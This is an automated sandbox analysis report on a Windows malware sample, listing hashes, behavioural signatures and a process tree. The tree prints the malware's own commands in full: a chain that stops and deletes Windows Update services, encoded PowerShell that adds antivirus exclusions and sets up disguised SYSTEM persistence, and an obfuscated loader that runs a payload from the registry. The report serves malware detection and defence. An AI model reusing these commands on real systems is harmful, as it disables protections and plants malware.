Analysis
-
max time kernel
10s -
max time network
16s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
01-09-2022 15:37
Static task
static1
Behavioral task
behavioral1
Sample
EdEYMrpFBNbTRHo.exe
Resource
win7-20220812-en
General
-
Target
EdEYMrpFBNbTRHo.exe
-
Size
4.5MB
-
MD5
b7c12ce33a5c2de80bcd7083d839df6e
-
SHA1
6d2bce616fc00cafeb2ae4c5499305b36fcfb4f1
-
SHA256
65970760831f083ce65c5ec185f5c1d1c73217bcf600de567f2960b592412c52
-
SHA512
b3cbb1c781217aee343352f5ef2668fec9aa70a3f8ed39eafef88815bc4b5a858965d4ea9d30f86e04cdff4d22bef4447333027a56fbc02fc9708203e9987225
-
SSDEEP
98304:Ha3DFNglg7shj9/X92ZmvG+Hc7supSg8MXGBl3Qbf2jYpvRhzPQA:q23V9/X9pvL+sWKMXGwDEYVx
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 3036 takeown.exe 2244 icacls.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
EdEYMrpFBNbTRHo.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation EdEYMrpFBNbTRHo.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 3036 takeown.exe 2244 icacls.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 17 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
EdEYMrpFBNbTRHo.exedescription pid process target process PID 2604 set thread context of 3216 2604 EdEYMrpFBNbTRHo.exe conhost.exe -
Drops file in Windows directory 1 IoCs
Processes:
conhost.exedescription ioc process File created C:\Windows\Tasks\dialersvc32.job conhost.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 4632 sc.exe 5068 sc.exe 316 sc.exe 640 sc.exe 4664 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry key 1 TTPs 9 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 4088 reg.exe 4312 reg.exe 2212 reg.exe 952 reg.exe 100 reg.exe 4892 reg.exe 452 reg.exe 3516 reg.exe 4240 reg.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exeEdEYMrpFBNbTRHo.exepowershell.exepid process 4832 powershell.exe 4832 powershell.exe 2604 EdEYMrpFBNbTRHo.exe 3136 powershell.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
Processes:
powershell.exeEdEYMrpFBNbTRHo.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exepowershell.exedescription pid process Token: SeDebugPrivilege 4832 powershell.exe Token: SeDebugPrivilege 2604 EdEYMrpFBNbTRHo.exe Token: SeShutdownPrivilege 944 powercfg.exe Token: SeCreatePagefilePrivilege 944 powercfg.exe Token: SeShutdownPrivilege 1184 powercfg.exe Token: SeCreatePagefilePrivilege 1184 powercfg.exe Token: SeShutdownPrivilege 4600 powercfg.exe Token: SeCreatePagefilePrivilege 4600 powercfg.exe Token: SeShutdownPrivilege 820 powercfg.exe Token: SeCreatePagefilePrivilege 820 powercfg.exe Token: SeTakeOwnershipPrivilege 3036 takeown.exe Token: SeDebugPrivilege 3136 powershell.exe -
Suspicious use of WriteProcessMemory 51 IoCs
Processes:
EdEYMrpFBNbTRHo.execmd.execmd.exedescription pid process target process PID 2604 wrote to memory of 4832 2604 EdEYMrpFBNbTRHo.exe powershell.exe PID 2604 wrote to memory of 4832 2604 EdEYMrpFBNbTRHo.exe powershell.exe PID 2604 wrote to memory of 532 2604 EdEYMrpFBNbTRHo.exe cmd.exe PID 2604 wrote to memory of 532 2604 EdEYMrpFBNbTRHo.exe cmd.exe PID 2604 wrote to memory of 4672 2604 EdEYMrpFBNbTRHo.exe cmd.exe PID 2604 wrote to memory of 4672 2604 EdEYMrpFBNbTRHo.exe cmd.exe PID 532 wrote to memory of 640 532 cmd.exe sc.exe PID 532 wrote to memory of 640 532 cmd.exe sc.exe PID 4672 wrote to memory of 944 4672 cmd.exe powercfg.exe PID 4672 wrote to memory of 944 4672 cmd.exe powercfg.exe PID 532 wrote to memory of 4664 532 cmd.exe sc.exe PID 532 wrote to memory of 4664 532 cmd.exe sc.exe PID 4672 wrote to memory of 1184 4672 cmd.exe powercfg.exe PID 4672 wrote to memory of 1184 4672 cmd.exe powercfg.exe PID 532 wrote to memory of 4632 532 cmd.exe sc.exe PID 532 wrote to memory of 4632 532 cmd.exe sc.exe PID 4672 wrote to memory of 4600 4672 cmd.exe powercfg.exe PID 4672 wrote to memory of 4600 4672 cmd.exe powercfg.exe PID 532 wrote to memory of 5068 532 cmd.exe sc.exe PID 532 wrote to memory of 5068 532 cmd.exe sc.exe PID 4672 wrote to memory of 820 4672 cmd.exe powercfg.exe PID 4672 wrote to memory of 820 4672 cmd.exe powercfg.exe PID 532 wrote to memory of 316 532 cmd.exe sc.exe PID 532 wrote to memory of 316 532 cmd.exe sc.exe PID 532 wrote to memory of 100 532 cmd.exe reg.exe PID 532 wrote to memory of 100 532 cmd.exe reg.exe PID 532 wrote to memory of 4892 532 cmd.exe reg.exe PID 532 wrote to memory of 4892 532 cmd.exe reg.exe PID 532 wrote to memory of 4088 532 cmd.exe reg.exe PID 532 wrote to memory of 4088 532 cmd.exe reg.exe PID 532 wrote to memory of 452 532 cmd.exe reg.exe PID 532 wrote to memory of 452 532 cmd.exe reg.exe PID 532 wrote to memory of 4312 532 cmd.exe reg.exe PID 532 wrote to memory of 4312 532 cmd.exe reg.exe PID 532 wrote to memory of 3036 532 cmd.exe takeown.exe PID 532 wrote to memory of 3036 532 cmd.exe takeown.exe PID 532 wrote to memory of 2244 532 cmd.exe icacls.exe PID 532 wrote to memory of 2244 532 cmd.exe icacls.exe PID 2604 wrote to memory of 3136 2604 EdEYMrpFBNbTRHo.exe powershell.exe PID 2604 wrote to memory of 3136 2604 EdEYMrpFBNbTRHo.exe powershell.exe PID 2604 wrote to memory of 3216 2604 EdEYMrpFBNbTRHo.exe conhost.exe PID 2604 wrote to memory of 3216 2604 EdEYMrpFBNbTRHo.exe conhost.exe PID 2604 wrote to memory of 3216 2604 EdEYMrpFBNbTRHo.exe conhost.exe PID 2604 wrote to memory of 3216 2604 EdEYMrpFBNbTRHo.exe conhost.exe PID 2604 wrote to memory of 3216 2604 EdEYMrpFBNbTRHo.exe conhost.exe PID 2604 wrote to memory of 3216 2604 EdEYMrpFBNbTRHo.exe conhost.exe PID 2604 wrote to memory of 3216 2604 EdEYMrpFBNbTRHo.exe conhost.exe PID 2604 wrote to memory of 3216 2604 EdEYMrpFBNbTRHo.exe conhost.exe PID 2604 wrote to memory of 3216 2604 EdEYMrpFBNbTRHo.exe conhost.exe PID 2604 wrote to memory of 3216 2604 EdEYMrpFBNbTRHo.exe conhost.exe PID 2604 wrote to memory of 3216 2604 EdEYMrpFBNbTRHo.exe conhost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\EdEYMrpFBNbTRHo.exe"C:\Users\Admin\AppData\Local\Temp\EdEYMrpFBNbTRHo.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAYgByAGwAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBtAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbwB4AGIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBpAHcAdwAjAD4A"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f3⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG8AcAAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AHQAZQBtAHAAIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB0AGUAbQBwAC4AZQB4AGUAJwApACAAPAAjAHcAaAByAGoAIwA+AA=="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\temp.exe"C:\Users\Admin\AppData\Local\Temp\temp.exe"3⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAbQB5AHcAIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEARwBVAEEAYwB3AEIAcwBBAEMATQBBAFAAZwBBAGcAQQBGAE0AQQBkAEEAQgBoAEEASABJAEEAZABBAEEAdABBAEYAQQBBAGMAZwBCAHYAQQBHAE0AQQBaAFEAQgB6AEEASABNAEEASQBBAEEAdABBAEUAWQBBAGEAUQBCAHMAQQBHAFUAQQBVAEEAQgBoAEEASABRAEEAYQBBAEEAZwBBAEMAYwBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBBAGcAQQBFAFkAQQBhAFEAQgBzAEEARwBVAEEAYwB3AEIAYwBBAEUAYwBBAGIAdwBCAHYAQQBHAGMAQQBiAEEAQgBsAEEARgB3AEEAUQB3AEIAbwBBAEgASQBBAGIAdwBCAHQAQQBHAFUAQQBYAEEAQgAxAEEASABBAEEAWgBBAEIAaABBAEgAUQBBAFoAUQBCAHkAQQBDADQAQQBaAFEAQgA0AEEARwBVAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGwAQQBIAEkAQQBZAGcAQQBnAEEARgBJAEEAZABRAEIAdQBBAEUARQBBAGMAdwBBAGcAQQBEAHcAQQBJAHcAQgB4AEEARwBVAEEASQB3AEEAKwBBAEEAPQA9ACIAJwApACAAPAAjAGYAcgAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQAUwB0AGEAcgB0AHUAcAApACAAPAAjAGMAawBrACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAeAB4ACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAdgB2AGUAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABFAGQARQBZAE0AcgBwAEYAQgBOAGIAVABSAEgAbwAuAGUAeABlACcAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGkAeQBiAHoAIwA+ADsAIABTAHQAYQByAHQALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAAPAAjAGgAYwBiAHgAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{9ff0bf94-814f-457f-bcb6-1d5a148ead6f}1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5440cb38dbee06645cc8b74d51f6e5f71
SHA1d7e61da91dc4502e9ae83281b88c1e48584edb7c
SHA2568ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe
SHA5123aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5359d1e37a264703c99ebd01eed362de5
SHA1a1122c8bf9848b3371cd191ba540864204d1d845
SHA2565781f3046b0d978469415a059cf5ceae0e532869e69ab1dffb8ed878bd299b07
SHA512ce3caa1d2205be8167b7cd48ebf538a9ce8c148643c26a20377894aa15cf00f90b2b5e2ebf35d40a0273c088abc11fe6f010e34691d7fbc4bef8d7e482f5087d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5c6faeb4000ac06f0b65ffc2d2f6548df
SHA1b89d2aeca98ec429e94dfe6d5d72c65ab8953869
SHA25677e0a51a2d796e8230ea42972ee18aeeec6d20a939fdcfe243c354975e93dc13
SHA512b82b3b239659642d1f235ceef7a2dc22a86521eb84bf6b483e06320fb54f2c18785264c77190bfa51b600c8370efd4e5993f318d97f63f3318bdf64d19b78064
-
C:\Users\Admin\AppData\Local\Temp\temp.exeFilesize
7KB
MD5f321da5881a6aaeb53da13d5c075406b
SHA1979ed66205d2bad63fc016dc8c32cff6a2b6fc05
SHA256a6bdf9fcd293ff8169731da2a0a9501ad3a4fd14ce1559bc3f3d26dae9e6f57c
SHA512c7cf54223afcf437d7206e97ce1003ebf5ddc2b8aa986003f53068a4fd873346298bc998abf303bd54a94e83689ac34786e98deb34446862c1c344121d46851b
-
C:\Users\Admin\AppData\Local\Temp\temp.exeFilesize
7KB
MD5f321da5881a6aaeb53da13d5c075406b
SHA1979ed66205d2bad63fc016dc8c32cff6a2b6fc05
SHA256a6bdf9fcd293ff8169731da2a0a9501ad3a4fd14ce1559bc3f3d26dae9e6f57c
SHA512c7cf54223afcf437d7206e97ce1003ebf5ddc2b8aa986003f53068a4fd873346298bc998abf303bd54a94e83689ac34786e98deb34446862c1c344121d46851b
-
memory/100-149-0x0000000000000000-mapping.dmp
-
memory/316-148-0x0000000000000000-mapping.dmp
-
memory/452-152-0x0000000000000000-mapping.dmp
-
memory/532-137-0x0000000000000000-mapping.dmp
-
memory/640-140-0x0000000000000000-mapping.dmp
-
memory/820-147-0x0000000000000000-mapping.dmp
-
memory/916-191-0x0000000000000000-mapping.dmp
-
memory/944-141-0x0000000000000000-mapping.dmp
-
memory/952-176-0x0000000000000000-mapping.dmp
-
memory/1096-187-0x0000000000000000-mapping.dmp
-
memory/1184-143-0x0000000000000000-mapping.dmp
-
memory/1664-188-0x0000000000000000-mapping.dmp
-
memory/1840-202-0x00007FF831C60000-0x00007FF831D1E000-memory.dmpFilesize
760KB
-
memory/1840-181-0x00007FF8148F0000-0x00007FF8153B1000-memory.dmpFilesize
10.8MB
-
memory/1840-189-0x00007FF832C10000-0x00007FF832E05000-memory.dmpFilesize
2.0MB
-
memory/1840-190-0x00007FF831C60000-0x00007FF831D1E000-memory.dmpFilesize
760KB
-
memory/1840-201-0x00007FF832C10000-0x00007FF832E05000-memory.dmpFilesize
2.0MB
-
memory/1840-204-0x00007FF8148F0000-0x00007FF8153B1000-memory.dmpFilesize
10.8MB
-
memory/2212-167-0x0000000000000000-mapping.dmp
-
memory/2244-155-0x0000000000000000-mapping.dmp
-
memory/2344-195-0x0000000004500000-0x0000000004522000-memory.dmpFilesize
136KB
-
memory/2344-183-0x00000000047C0000-0x0000000004DE8000-memory.dmpFilesize
6.2MB
-
memory/2344-198-0x0000000004F60000-0x0000000004FC6000-memory.dmpFilesize
408KB
-
memory/2344-179-0x0000000004020000-0x0000000004056000-memory.dmpFilesize
216KB
-
memory/2344-197-0x00000000046C0000-0x0000000004726000-memory.dmpFilesize
408KB
-
memory/2420-177-0x0000000000000000-mapping.dmp
-
memory/2564-192-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/2564-193-0x00000001400033F4-mapping.dmp
-
memory/2564-196-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/2564-200-0x00007FF831C60000-0x00007FF831D1E000-memory.dmpFilesize
760KB
-
memory/2564-194-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/2564-203-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/2564-199-0x00007FF832C10000-0x00007FF832E05000-memory.dmpFilesize
2.0MB
-
memory/2564-205-0x00007FF832C10000-0x00007FF832E05000-memory.dmpFilesize
2.0MB
-
memory/2604-132-0x00000000006A0000-0x0000000000B26000-memory.dmpFilesize
4.5MB
-
memory/2604-133-0x00007FF8148F0000-0x00007FF8153B1000-memory.dmpFilesize
10.8MB
-
memory/2604-139-0x00000000036D0000-0x00000000036E2000-memory.dmpFilesize
72KB
-
memory/2604-178-0x00007FF8148F0000-0x00007FF8153B1000-memory.dmpFilesize
10.8MB
-
memory/2712-185-0x0000000000000000-mapping.dmp
-
memory/3036-154-0x0000000000000000-mapping.dmp
-
memory/3136-173-0x00007FF8148F0000-0x00007FF8153B1000-memory.dmpFilesize
10.8MB
-
memory/3136-156-0x0000000000000000-mapping.dmp
-
memory/3136-165-0x00007FF8148F0000-0x00007FF8153B1000-memory.dmpFilesize
10.8MB
-
memory/3216-163-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/3216-157-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/3216-158-0x0000000140001844-mapping.dmp
-
memory/3216-159-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/3216-160-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/3216-164-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/3264-186-0x0000000000000000-mapping.dmp
-
memory/3516-172-0x0000000000000000-mapping.dmp
-
memory/4048-166-0x0000000000000000-mapping.dmp
-
memory/4048-180-0x00007FF8148F0000-0x00007FF8153B1000-memory.dmpFilesize
